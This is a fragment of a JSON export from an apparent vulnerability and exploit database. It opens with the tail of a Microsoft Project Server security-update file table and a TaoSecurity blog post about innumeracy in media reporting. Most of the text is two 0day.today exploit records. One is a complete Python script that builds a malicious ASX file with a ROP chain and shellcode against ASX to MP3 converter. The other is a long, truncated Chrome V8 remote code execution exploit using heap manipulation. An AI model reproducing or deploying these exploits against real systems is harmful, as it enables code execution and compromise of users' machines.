</td><td>projectsoverviewpowerviewdashboard.xlsx</td><td>\u00a0</td><td>497232</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcesoverview.xlsx.1051</td><td>resourcesoverview.xlsx</td><td>\u00a0</td><td>298148</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverview.xlsx.1060</td><td>projectsoverview.xlsx</td><td>\u00a0</td><td>477128</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverviewpowerviewdashboard.xlsx.1060</td><td>projectsoverviewpowerviewdashboard.xlsx</td><td>\u00a0</td><td>493118</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcesoverview.xlsx.1060</td><td>resourcesoverview.xlsx</td><td>\u00a0</td><td>293438</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverview.xlsx.1053</td><td>projectsoverview.xlsx</td><td>\u00a0</td><td>476946</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverviewpowerviewdashboard.xlsx.1053</td><td>projectsoverviewpowerviewdashboard.xlsx</td><td>\u00a0</td><td>492744</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcesoverview.xlsx.1053</td><td>resourcesoverview.xlsx</td><td>\u00a0</td><td>293343</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverview.xlsx.1055</td><td>projectsoverview.xlsx</td><td>\u00a0</td><td>481295</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverviewpowerviewdashboard.xlsx.1055</td><td>projectsoverviewpowerviewdashboard.xlsx</td><td>\u00a0</td><td>492972</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcesoverview.xlsx.1055</td><td>resourcesoverview.xlsx</td><td>\u00a0</td><td>293594</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverview.xlsx.1058</td><td>projectsoverview.xlsx</td><td>\u00a0</td><td>512730</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverviewpowerviewdashboard.xlsx.1058</td><td>projectsoverviewpowerviewdashboard.xlsx</td><td>\u00a0</td><td>531084</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcesoverview.xlsx.1058</td><td>resourcesoverview.xlsx</td><td>\u00a0</td><td>320196</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverview.xlsx.2052</td><td>projectsoverview.xlsx</td><td>\u00a0</td><td>482197</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverviewpowerviewdashboard.xlsx.2052</td><td>projectsoverviewpowerviewdashboard.xlsx</td><td>\u00a0</td><td>493283</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcesoverview.xlsx.2052</td><td>resourcesoverview.xlsx</td><td>\u00a0</td><td>294262</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverview.xlsx.1028</td><td>projectsoverview.xlsx</td><td>\u00a0</td><td>482317</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectsoverviewpowerviewdashboard.xlsx.1028</td><td>projectsoverviewpowerviewdashboard.xlsx</td><td>\u00a0</td><td>497483</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcesoverview.xlsx.1028</td><td>resourcesoverview.xlsx</td><td>\u00a0</td><td>298490</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>conversion.proof.mshy2_hu.lex</td><td>mshy3hu.lex</td><td>\u00a0</td><td>933579</td><td>11-Apr-18</td><td>03:51</td></tr><tr><td>mshy2_en.lex_1038</td><td>mshy3hu.lex</td><td>\u00a0</td><td>933579</td><td>11-Apr-18</td><td>03:51</td></tr><tr><td>wac.conversion.proof.mshy2_hu.lex</td><td>mshy3hu.lex</td><td>\u00a0</td><td>933579</td><td>11-Apr-18</td><td>03:51</td></tr><tr><td>conversion.proof.mshy2_hu.dll</td><td>mshy3hu.dll</td><td>15.0.0.1</td><td>218984</td><td>11-Apr-18</td><td>03:51</td></tr><tr><td>mshy2_en.dll_1038</td><td>mshy3hu.dll</td><td>15.0.0.1</td><td>218984</td><td>11-Apr-18</td><td>03:51</td></tr><tr><td>wac.conversion.proof.mshy2_hu.dll</td><td>mshy3hu.dll</td><td>15.0.0.1</td><td>218984</td><td>11-Apr-18</td><td>03:51</td></tr><tr><td>pwa.pwaribbon.pwaribbon.xml_14</td><td>pwaribbon.xml</td><td>\u00a0</td><td>641121</td><td>11-Apr-18</td><td>03:54</td></tr><tr><td>pwa.library.statusapprovalssatellite.js_14</td><td>statusapprovalssatellite.js</td><td>\u00a0</td><td>19682</td><td>11-Apr-18</td><td>03:54</td></tr><tr><td>pwa.library.timesheetsatellite.js_14</td><td>timesheetsatellite.js</td><td>\u00a0</td><td>56379</td><td>11-Apr-18</td><td>03:54</td></tr><tr><td>pwa.library.pdplib.debug.js_14</td><td>pdplib.debug.js</td><td>\u00a0</td><td>79311</td><td>11-Apr-18</td><td>03:54</td></tr><tr><td>pwa.library.pdplib.js_14</td><td>pdplib.js</td><td>\u00a0</td><td>53413</td><td>11-Apr-18</td><td>03:54</td></tr><tr><td>pwa.library.projectserverscripts.debug.js_14</td><td>projectserverscripts.debug.js</td><td>\u00a0</td><td>414861</td><td>11-Apr-18</td><td>03:54</td></tr><tr><td>pwa.library.projectserverscripts.js_14</td><td>projectserverscripts.js</td><td>\u00a0</td><td>308959</td><td>11-Apr-18</td><td>03:54</td></tr><tr><td>pwa.library.pwaparts.ascx_14</td><td>pwaparts.ascx</td><td>\u00a0</td><td>19504</td><td>11-Apr-18</td><td>03:54</td></tr><tr><td>pwa.statusing.locktask.aspx_14</td><td>locktask.aspx</td><td>\u00a0</td><td>8056</td><td>11-Apr-18</td><td>03:54</td></tr></tbody></table></div></div></div><h2>How to get help and support for this security update</h2><p>Help for installing updates:\u00a0<a href=\"https://support.microsoft.com/ph/6527\" target=\"_self\">Windows Update: FAQ</a></p><p>Security solutions for IT professionals:\u00a0<a href=\"https://technet.microsoft.com/security/bb980617.aspx\" target=\"_self\">TechNet Security Support and Troubleshooting</a></p><p>Help for protecting your Windows-based computer from viruses and malware:\u00a0<a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" target=\"_self\">Microsoft Secure</a></p><p>Local support according to your country:\u00a0<a href=\"https://www.microsoft.com/en-us/locale.aspx\" target=\"_self\">International Support</a></p><p><span><span>Propose a feature or provide feedback on SharePoint: <a href=\"http://sharepoint.uservoice.com/\" target=\"_blank\">SharePoint User Voice portal</a></span></span></p></body></html>", "edition": 4, "modified": "2020-04-16T08:58:23", "id": "KB4022130", "href": "https://support.microsoft.com/en-us/help/4022130/", "published": "2018-05-08T00:00:00", "title": "Description of the security update for Project Server 2013: May 8, 2018", "type": "mskb", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "taosecurity": [{"lastseen": "2018-05-19T13:16:31", "bulletinFamily": "blog", "cvelist": [], "description": "[](<https://4.bp.blogspot.com/-My3rOchU8qk/Wl4ncl1YuiI/AAAAAAAArEI/CCzonB79w2QbDL9_H6oghYxEyMfU1rdqQCLcBGAs/s1600/fakenews.png>)\n\nAnyone involved in cybersecurity reporting needs a strong sense of numeracy, or mathematical literacy. I see two sorts of examples of innumeracy repeatedly in the media. \n \nThe first involves the time value of money. Recently [CNN](<https://twitter.com/taosecurity/status/950754558925516800>) claimed Amazon CEO Jeff Bezos was the \"richest person in history\" and [Recode](<https://twitter.com/taosecurity/status/951062005934448641>) said Bezos was \"now worth more than Bill Gates ever was.\" Thankfully both [Richard Steinnon](<https://twitter.com/cyberwar/status/950755820031000577>) and [Noah Kirsch](<https://t.co/Be41SoCSht>) recognized the foolishness of these reports, correctly noting that [Bezos would only rank number 17 on a list where wealth was adjusted for inflation](<https://t.co/kXmIoSdgsn>). \n \nThis failure to recognize the time value of money is pervasive. Just today I heard the host of a podcast claim that the 1998 Jackie Chan movie Rush Hour was \"the top grossing martial arts film of all time.\" According to [Box Office Mojo](<http://www.boxofficemojo.com/movies/?id=rushhour.htm>), Rush Hour earned $244,386,864 worldwide. [Adjusting for inflation](<http://www.usinflationcalculator.com/>), in 2017 dollars that's $367,509,865.67 -- impressive! \n \nFor comparison, I researched the box office returns for Bruce Lee's Enter the Dragon. Box Office Mojo lacked data, but I found a [2017 article](<https://editorial.rottentomatoes.com/article/bruce-lees-enter-the-dragon-to-be-remade/>) stating his 1973 movie earned \"$25 million in the U.S. and $90 million worldwide, excluding Hong Kong.\" If I adjust the worldwide figure of $90 million for inflation, in 2017 dollars that's $496,864,864.86 -- making Enter the Dragon easily more successful than Rush Hour. \n \nIf you're wondering about Crouching Tiger, Hidden Dragon, that 2000 movie earned $213,525,736 worldwide. That movie earned less than Rush Hour, and arrived two years later, so it's not worth doing the inflation math. \n \nThe take-away is that any time you are comparing dollars from different time periods, you must adjust for inflation to have your comparisons have any meaning whatsoever. \n \n[](<https://2.bp.blogspot.com/-Snw6Y5aFlmc/Wl4tO5AHmZI/AAAAAAAArEY/ppLeEkk8Tqwz76F94dwUZa0f706DPJlswCLcBGAs/s1600/freak.jpg>) \n--- \nChart by @CanadianFlags \nThe second sort of innumeracy I'd like to highlight today also involves money, but in a slightly different way. This involves changes in values over time. \n \nFor example, a company may grow revenue from 2015 to 2016, with 2015 revenue being $100,000 and 2016 being $200,000. That's a 100% gain. \n \nIf the company grows another $100,000 from 2016 to 2017, from $200,000 to $300,000, the growth rate has declined to 50%. To have maintained a 100% growth rate, the company needed to make $400,000 in 2016. \n \nThat same $100,000 dollar increase isn't so great when compared to the new base value. \n \nWe see the same dynamic at play when tracking the growth of individual stocks or market indices over time. \n \n[CNN wrote a story about the 1,000 point rise](<https://t.co/N8y0fIKB6J>) in the Dow Jones Industrial Average over a period of 7 days, from 25,000 to 26,000. One person [Tweeted](<https://twitter.com/CanadianFlags/status/953282785271255041>) the chart at the above right, asking \"is that healthy?\" My answer -- you need a proper chart! \n \nMy second reaction was \"that's a jump, but it's only (1-(25000/26000)) = 3.8%. Yes, 3.8% in 7 days is a lot, but that doesn't even rate in the [top 20 one-day percentage gains or losses over the life of the index](<https://en.wikipedia.org/wiki/List_of_largest_daily_changes_in_the_Dow_Jones_Industrial_Average#Largest_percentage_changes>). \n \nIf the DJIA gained 1,000 points in 7 days 5 years ago, when the market was at 13,649, a rise to 14,649 would be a 6.8% gain. 20 years ago the market was roughly 3,310, so a 1,000 point rise to 4,310 would be a massive 23.2% gain. \n \nA better way to depict the growth in the DJIA would be to use a logarithmic chart. The charts below show a linear version on the top and a logarithmic version below it. \n \n[](<https://2.bp.blogspot.com/-PN26XJ5T4Yo/Wl4wgOFZP0I/AAAAAAAArEk/y9L5-8sRSmYbLRS6nvkD1J0eiW-dkpqqgCLcBGAs/s1600/dow30yearcompare.tif>) \n--- \n \n \n \nUsing [barcharts.com](<http://barcharts.com/>), I drew the last 30 years of the DJIA at the top using a linear Y axis, meaning there is equal distance between 2,000 and 4,000, 4,000 and 6,000, and so on. The blue line shows the slope of the growth. \n \nI then drew the same period using a logarithmic Y axis, meaning the percentage gains from one line to another are equal. For example, a 100% increase from 1,000 to 2,000 occupies the same distance as the 100% increase from 5,000 to 10,000. The green line shows the slope of the growth. \n \nI put the blue and green lines on both charts to permit comparison of the slopes. As you can see, the growth, when properly indicated using a log chart and the green line, is less than the exaggerations introduced by the linear chart blue line. \n \nThere is indeed an upturn recently in the log chart, but the growth is probably on trend over time. \n \nWhile we're talking about the market, let's take one minute to smack down the old trope that \"what comes up, must come down.\" There is no \"law of gravity\" in investing, at least for the US market, as a whole. \n \nThe best example I have seen of the reality of the situation is this 2017 article titled [The Dow\u2019s tumultuous 120-year history, in one chart](<https://www.marketwatch.com/story/the-dows-tumultuous-120-year-history-in-one-chart-2017-03-23>). Here is the chart: \n \n[](<https://1.bp.blogspot.com/-wbD4dPJyZvI/Wl4ysU3LW1I/AAAAAAAArE8/r_eMzL14hJsDOc3G_D_3QR9PycGIPQy7gCLcBGAs/s1600/history_of_market_corrections2-hires.png>) \n--- \n| Chart by Chris Kacher, managing director of MoKa Investors \n--- \n \nWhat an amazing story. The title of the article should not be gloomy. It should be triumphant. Despite two World Wars, a Cold War, wars in Korea, Vietnam, the Middle East, and elsewhere, assassinations of world leaders, market depressions and recessions, and so on, the trend line is up, and up in a big way. While the DJIA doesn't represent the entire US market, it captures enough of it to be representative. This is why I do not bet against the US market over the long term. (And yes I recognize that [the market and the economy are different](<http://www.businessinsider.com/sp-is-not-gdp-2014-11>).) \n \nIndividual companies may disappear, and the DJIA has indeed been changed many times over the years. However, those changes were made so that the index roughly reflected the makeup of the economy. Is it perfect? No. Does it capture the overall directional trend line since 1896? Yes. \n \nPlease keep in mind these two sorts of innumeracy -- the time value of money, and the importance of percentage changes over time -- when dealing with numbers and time.\n\nCopyright 2003-2018 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com)", "modified": "2018-01-16T17:31:57", "published": "2018-01-16T17:27:00", "id": "TAOSECURITY:D3F80C640B03474D91F23DCB50FFEA6D", "href": "https://taosecurity.blogspot.com/2018/01/addressing-innumeracy-in-reporting.html", "type": "taosecurity", "title": "Addressing Innumeracy in Reporting", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-08T11:39:49", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2017-10-10T00:00:00", "title": "ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15083"], "modified": "2017-10-10T00:00:00", "href": "https://0day.today/exploit/description/28762", "id": "1337DAY-ID-28762", "sourceData": "import struct,sys\r\nhead ='''<ASX version=\"3.0\">\r\n<Entry>\r\n<REF HREF=\"mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''\r\n \r\n#offset 17375\r\njunk = \"A\" *17375\r\n \r\n#0x1003df8e\r\n#0x774e1035\r\nEIP=\"\\x36\\x10\\x4e\\x77\"\r\n \r\nadjust=\"A\" *4\r\n \r\ndef create_rop_chain():\r\n \r\n rop_gadgets = [\r\n 0x73dd5dce, # POP EAX # RETN [MFC42.DLL] \r\n 0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll]\r\n 0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll] \r\n 0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL] \r\n 0x7c96feb7, # POP EBP # RETN [ntdll.dll] \r\n 0x7608fcec, # & push esp # ret [MSVCP60.dll]\r\n 0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll] \r\n 0xfffffdff, # Value to negate, will become 0x00000201\r\n 0x77d74960, # NEG EAX # RETN [USER32.dll] \r\n 0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll] \r\n 0x01d64827, # POP EAX # RETN [msvos.dll] \r\n 0xffffffc0, # Value to negate, will become 0x00000040\r\n 0x77d74960, # NEG EAX # RETN [USER32.dll] \r\n 0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll] \r\n 0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll] \r\n 0x77da1d04, # &Writable location [USER32.dll]\r\n 0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll] \r\n 0x76091182, # RETN (ROP NOP) [MSVCP60.dll]\r\n 0x7d7da123, # POP EAX # RETN [WMVCore.DLL] \r\n 0x90909090, # nop\r\n 0x77195015, # PUSHAD # RETN [OLEAUT32.dll] \r\n ]\r\n return ''.join(struct.pack('<I', _) for _ in rop_gadgets)\r\n \r\nrop_chain = create_rop_chain()\r\n \r\n#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b \"\\x00\\x0a\\x0d EXITFUNC=seh\r\n#badcharacters \"\\x00\\x0a\\x0d\"\r\n \r\nbuf = \"\"\r\nbuf += \"\\xda\\xd6\\xba\\xf5\\xa4\\x32\\xf4\\xd9\\x74\\x24\\xf4\\x5d\\x31\"\r\nbuf += \"\\xc9\\xb1\\x31\\x83\\xc5\\x04\\x31\\x55\\x14\\x03\\x55\\xe1\\x46\"\r\nbuf += \"\\xc7\\x08\\xe1\\x05\\x28\\xf1\\xf1\\x69\\xa0\\x14\\xc0\\xa9\\xd6\"\r\nbuf += \"\\x5d\\x72\\x1a\\x9c\\x30\\x7e\\xd1\\xf0\\xa0\\xf5\\x97\\xdc\\xc7\"\r\nbuf += \"\\xbe\\x12\\x3b\\xe9\\x3f\\x0e\\x7f\\x68\\xc3\\x4d\\xac\\x4a\\xfa\"\r\nbuf += \"\\x9d\\xa1\\x8b\\x3b\\xc3\\x48\\xd9\\x94\\x8f\\xff\\xce\\x91\\xda\"\r\nbuf += \"\\xc3\\x65\\xe9\\xcb\\x43\\x99\\xb9\\xea\\x62\\x0c\\xb2\\xb4\\xa4\"\r\nbuf += \"\\xae\\x17\\xcd\\xec\\xa8\\x74\\xe8\\xa7\\x43\\x4e\\x86\\x39\\x82\"\r\nbuf += \"\\x9f\\x67\\x95\\xeb\\x10\\x9a\\xe7\\x2c\\x96\\x45\\x92\\x44\\xe5\"\r\nbuf += \"\\xf8\\xa5\\x92\\x94\\x26\\x23\\x01\\x3e\\xac\\x93\\xed\\xbf\\x61\"\r\nbuf += \"\\x45\\x65\\xb3\\xce\\x01\\x21\\xd7\\xd1\\xc6\\x59\\xe3\\x5a\\xe9\"\r\nbuf += \"\\x8d\\x62\\x18\\xce\\x09\\x2f\\xfa\\x6f\\x0b\\x95\\xad\\x90\\x4b\"\r\nbuf += \"\\x76\\x11\\x35\\x07\\x9a\\x46\\x44\\x4a\\xf0\\x99\\xda\\xf0\\xb6\"\r\nbuf += \"\\x9a\\xe4\\xfa\\xe6\\xf2\\xd5\\x71\\x69\\x84\\xe9\\x53\\xce\\x74\"\r\nbuf += \"\\x1b\\x6e\\xda\\xe1\\x82\\x1b\\xa7\\x6f\\x35\\xf6\\xeb\\x89\\xb6\"\r\nbuf += \"\\xf3\\x93\\x6d\\xa6\\x71\\x96\\x2a\\x60\\x69\\xea\\x23\\x05\\x8d\"\r\nbuf += \"\\x59\\x43\\x0c\\xee\\x3c\\xd7\\xcc\\xdf\\xdb\\x5f\\x76\\x20\"\r\n \r\nshellcode=\"S\"*10+buf\r\n \r\nprint \"Length of shellcode is:\",len(shellcode)\r\nprint \"Length of ropchain is:\",len(rop_chain)\r\n \r\nprint\"Calculating Garbage:\",(26000-17375-4-4-len(shellcode)-len(rop_chain))\r\n \r\ngarbage= \"C\" *8303\r\n \r\nfoot ='''_playlis.wma\"/>\r\n</Entry>\r\n</ASX>'''\r\n \r\npayload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot\r\n \r\nfobj = open(\"exploit.asx\",\"w\")\r\nfobj.write(payload)\r\nfobj.close()\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28762"}, {"lastseen": "2018-04-09T13:37:24", "edition": 1, "description": "Exploit for Android platform in category remote exploits", "published": "2017-06-14T00:00:00", "title": "Google Chrome - V8 Private Property Arbitrary Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9651"], "modified": "2017-06-14T00:00:00", "href": "https://0day.today/exploit/description/27954", "id": "1337DAY-ID-27954", "sourceData": "<html>\r\n// Source: https://github.com/secmob/pwnfest2016/\r\n<script>\r\nfunction exploit(){\r\n \r\nfunction to_hex(num){\r\n return (num>>>0).toString(16);\r\n}\r\nfunction intarray_to_double(int_arr){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n uBuf[0]=int_arr[0];\r\n uBuf[1]=int_arr[1];\r\n return dBuf[0];\r\n}\r\n \r\nfunction str_to_double(str){//leng of str must be 8\r\n var dBuf = new Float64Array(1);\r\n var u8Buf = new Uint8Array(dBuf.buffer);\r\n for(var i=0;i<str.length;i++){\r\n u8Buf[i] = str.charCodeAt(i);\r\n }\r\n return dBuf[0];\r\n}\r\nfunction double_to_array(value){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n dBuf[0]=value;\r\n return uBuf;\r\n}\r\n \r\nfunction gc(){\r\n for(var i=0;i<0x100000/16;i++){\r\n new String;\r\n }\r\n}\r\nfunction getHiddenValue(){\r\n var obj = {};\r\n var oob = \"/re/\";\r\n //oob = oob.replace(\"re\",\"*\".repeat(0x2000));\r\n oob = oob.replace(\"re\",\"*\".repeat(0x100000));\r\n var str = 'class x extends Array{'+oob+\"}\";\r\n var fun = eval(str);\r\n Object.assign(obj,fun);\r\n return obj;\r\n}\r\nvar obWin;\r\nfunction makeOobString(){\r\n var hiddenValue = getHiddenValue();\r\n var magicStr = \"bbbb\";\r\n var arr=[];\r\n var str = 'class x extends Array{}';\r\n for(var i=0;i<str.length;i++){\r\n arr[i]=str.charCodeAt(i);\r\n }\r\n var ob = new Array(0x200);\r\n ob.fill(0x31313131);\r\n gc();\r\n gc();\r\n str=String.fromCharCode.apply(null,arr);\r\n ob=ob.concat(0x32323232);\r\n var fun = eval(str); \r\n ob[2]=str;\r\n ob[3]=ob;\r\n Object.assign(fun,hiddenValue);\r\n var oobString = fun.toString();\r\n gc();\r\n gc();\r\n print(\"begin search\");\r\n var subStr = oobString.substr(0,0x8000);\r\n var pos = subStr.indexOf(magicStr);\r\n print(\"end search\");\r\n if(pos==-1){\r\n print(\"find magic failed\");\r\n postMessage(false);\r\n self.close();\r\n print(\"unpossible\");\r\n throw \"error\";\r\n }else{\r\n print(\"find magic at \"+pos);\r\n \r\n }\r\n oobString = oobString.substr(pos,ob.length*4);\r\n obWin=ob;\r\n return oobString;\r\n}\r\nvar oobString = makeOobString();\r\nprint(\"get oob string successfully\");\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n /*document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");*/\r\n}\r\nfunction str2arr(str,len){//len must be multile of 4\r\n if(len===undefined)\r\n len = str.length;\r\n var u8a = new Uint8Array(len);\r\n for(var i=0;i<len;i++){\r\n u8a[i] = str.charCodeAt(i);\r\n }\r\n return new Uint32Array(u8a.buffer);\r\n}\r\nfunction pArrayInHex(arr){\r\n var result=\"<p style='font-size:8px'>\";\r\n for(var i=0;i<arr.length;i++){\r\n result+=(arr[i]+0x100000000).toString(16).substr(-8);\r\n result+=\" \";\r\n if(i%8==7)\r\n result+=\"<p style='font-size:8px'>\";\r\n }\r\n result+=\"<p>\";\r\n print(result);\r\n //alert(result);\r\n return result;\r\n}\r\nfunction pStrInHex(str){\r\n //var result=\"<p style='font-size:8px'>\";\r\n var result=\"\\n\";\r\n for(var i=0;i<str.length;i++){\r\n var code = str.charCodeAt(i);\r\n result+=(code+0x100).toString(16).substr(-2);\r\n if(i%4==3)\r\n result+=\" \";\r\n if(i%32==31)\r\n // result+=\"<p style='font-size:8px'>\";\r\n result+=\"\\n\";\r\n }\r\n // result+=\"<p>\";\r\n result+=\"\\n\";\r\n print(result);\r\n return result;\r\n}\r\nfunction getObjAddr(obj){\r\n obWin[0]=obj;\r\n var value2= ((str2arr(oobString,4))[0]);\r\n return value2>>>0;\r\n}\r\n \r\nvar getObj24BitsAddr = function(){\r\n var smi=0;\r\n var code = 0;\r\n var i=0;\r\n //don't allocate heap object\r\n function getAddr(obj){\r\n obWin[0]=obj;\r\n value=0;\r\n code = 0;\r\n i=0;\r\n for(i=2;i>=0;i--){\r\n code = oobString.charCodeAt(i);\r\n value = code+value*256;\r\n }\r\n return value;\r\n }\r\n return getAddr;\r\n}();\r\n \r\n \r\nvar lengthInOldSpace = 0xfffffffc;\r\nvar abarr=new Array(800);\r\nfunction sprayVM(){\r\n var i=0;\r\n var j=0;\r\n try{\r\n for(i=0;i<20;i++){\r\n var u8 = new Uint8Array(0x10000000-0x500);\r\n abarr[i]=u8;\r\n }\r\n }catch(e){}\r\n try{\r\n for(j=0;j<100;j++){\r\n var u8 = new Uint8Array(0x8000000-0x500);\r\n abarr[i+j]=u8;\r\n }\r\n }catch(e){}\r\n print(\"allocate \"+i+\" 256M \"+j+\" 16M \")\r\n function getRandomInt(min, max) {\r\n min = Math.ceil(min);\r\n max = Math.floor(max);\r\n return Math.floor(Math.random() * (max - min)) + min;\r\n }\r\n delete abarr[getRandomInt(0,i)];\r\n}\r\n \r\n \r\nfunction getNewSpaceAddrs(){\r\n /*var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";*/\r\n var objsInNewSpace = new Array(80);\r\n for(var i=0;i<objsInNewSpace.length;i++){\r\n //var xx=escape(str);\r\n var xx = new Array(0x70000/4);\r\n objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;\r\n //\u4f7fnewspace\u66f4\u79bb\u6563\r\n new Uint8Array(0x100000-0x500);\r\n new Uint8Array(0x100000-0x500);\r\n }\r\n function compareNumbers(a, b) {\r\n return a - b;\r\n }\r\n objsInNewSpace = Array.from(new Set(objsInNewSpace));\r\n objsInNewSpace = objsInNewSpace.sort(compareNumbers);\r\n return objsInNewSpace;\r\n}\r\n \r\n \r\nprint(\"begin get new space address\");\r\nvar objsInNewSpace = getNewSpaceAddrs();\r\nwhile(objsInNewSpace.length<16){\r\n objsInNewSpace = getNewSpaceAddrs();\r\n print(\"new space addresses\");\r\n pArrayInHex(objsInNewSpace);\r\n}\r\n \r\ntry{\r\nsprayVM();\r\n}catch(e){}\r\n \r\nvar selectedTrunk = 0;\r\nvar selectedStr = \"\";\r\nfunction bruteForceFengShui(){\r\n var huge_str = \"x\".repeat(0x100000-0x9000);//-0x9000\r\n huge_str +=\"%\";\r\n var hold = new Array(100);\r\n //var holdaddress = new Array(100);\r\n for(var i=0;;i++){\r\n var large = escape(huge_str);\r\n var addr = getObjAddr(large);\r\n //console.log(addr.toString(16) + \" \"+i);\r\n if(i<hold.length){\r\n hold[i]=large;\r\n //holdaddress[i]=addr;\r\n }\r\n addr=(addr&0xfff00000)>>>0;\r\n addr = addr-0x100000;\r\n if(objsInNewSpace.indexOf(addr)!=-1){\r\n selectedTrunk = addr;\r\n selectedStr = large;\r\n abarr.fill(1);\r\n hold.fill(1);\r\n //holdaddress.fill(1);\r\n break;\r\n }\r\n if(i===150){\r\n /*i=0;\r\n print(\"tried 200 times\");\r\n abarr.fill(1);\r\n try{\r\n sprayVM();\r\n }catch(e){};*/\r\n postMessage(false);\r\n close();\r\n throw \"exceed limits\";\r\n }\r\n }\r\n}\r\nbruteForceFengShui();\r\n//to avoid allocate memory latter, initilize here\r\nvar nextTrunk = selectedTrunk + 0x100000;\r\n \r\n//\u751f\u6210\u4e00\u5757\u8db3\u591f\u5927\u7684\u53ef\u8bfb\u5199\u5185\u5b58\r\nvar huge_str = \"eval('');\";\r\n//8000\u4e0d\u80fd\u592a\u5927\uff0c\u592a\u5927\u4f1a\u4f7fnew_space\u589e\u5927\r\nfor(var i=0;i<8000;i++) huge_str += 'a.a;';\r\nhuge_str += \"return 10;\";\r\nvar huge_func = new Function('a',huge_str);\r\nhuge_func({});\r\n \r\nfunction fillNewSpace(origObj){\r\n //first object in new space at 0x8100, new spaces layout\r\n //0x40000\r\n //0x37f00\r\n //.....\r\n //0x40000\r\n var gap = \"g\".repeat(0x37f00-12-3);//12 is head of string,3 %25\r\n var gap = gap+\"%\";\r\n //flat gap\r\n gap.substr(0,100);\r\n var fillstr = \"%20a\".repeat((0x40000-12)/4);\r\n fillstr = escape(fillstr);\r\n var addr=0;\r\n for(var i=0;i<0x100;i++){\r\n addr = getObj24BitsAddr(origObj);\r\n if((addr&0xfffff)===0x8101)\r\n origObj=escape(gap);\r\n else\r\n origObj=unescape(fillstr);\r\n }\r\n}\r\n \r\nfunction findNewSpace(){\r\n var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";\r\n for(var i=0;;i++){\r\n var xx=escape(str);\r\n var straddr = getObjAddr(xx);\r\n addr=(straddr&0xfff00000)>>>0;\r\n if(addr===selectedTrunk){\r\n print(\"good state \"+straddr.toString(16));\r\n break;\r\n }\r\n }\r\n}\r\n \r\nfunction myencode(str){\r\n var arr = [];\r\n for(var i=0;i<str.length;i++){\r\n if(i%2==1)\r\n arr.push(str.charCodeAt(i));\r\n else{\r\n arr.push(37);//%\r\n var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);\r\n arr.push(hexstr.charCodeAt(0));\r\n arr.push(hexstr.charCodeAt(1));\r\n }\r\n }\r\n return String.fromCharCode.apply(null,arr);\r\n}\r\n \r\nvar dArray = [];\r\nvar index = (0x8100-36)*2;\r\nfor(var i=0;i<0x20000/8;i++){\r\n dArray[i]=str_to_double(\"%03x%03x\");\r\n}\r\n \r\nvar occulen = 0;\r\nvar i = 0;\r\nvar savedChunk = new Uint8Array(0x8100);\r\nvar hiddenValue = getHiddenValue();\r\nvar arr=[];\r\nfillNewSpace(new String);\r\nfindNewSpace();\r\nvar classStr = 'class x extends Array{}';\r\nfor(var i=0;i<classStr.length;i++){\r\n arr[i]=classStr.charCodeAt(i);\r\n}\r\nvar magicStr = String.fromCharCode(0x86,0x24);\r\nclassStr=String.fromCharCode.apply(null,arr);\r\nvar ab = new ArrayBuffer(0x1243);\r\nvar fun = eval(classStr); \r\nObject.assign(fun,hiddenValue);\r\nvar oobStr = fun.toString();\r\n \r\n/*(gdb) x/20xw 0x5600c45c array buffer layout\r\n * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020\r\n * 0x5600c46c: 0x09fda368 0x00000004 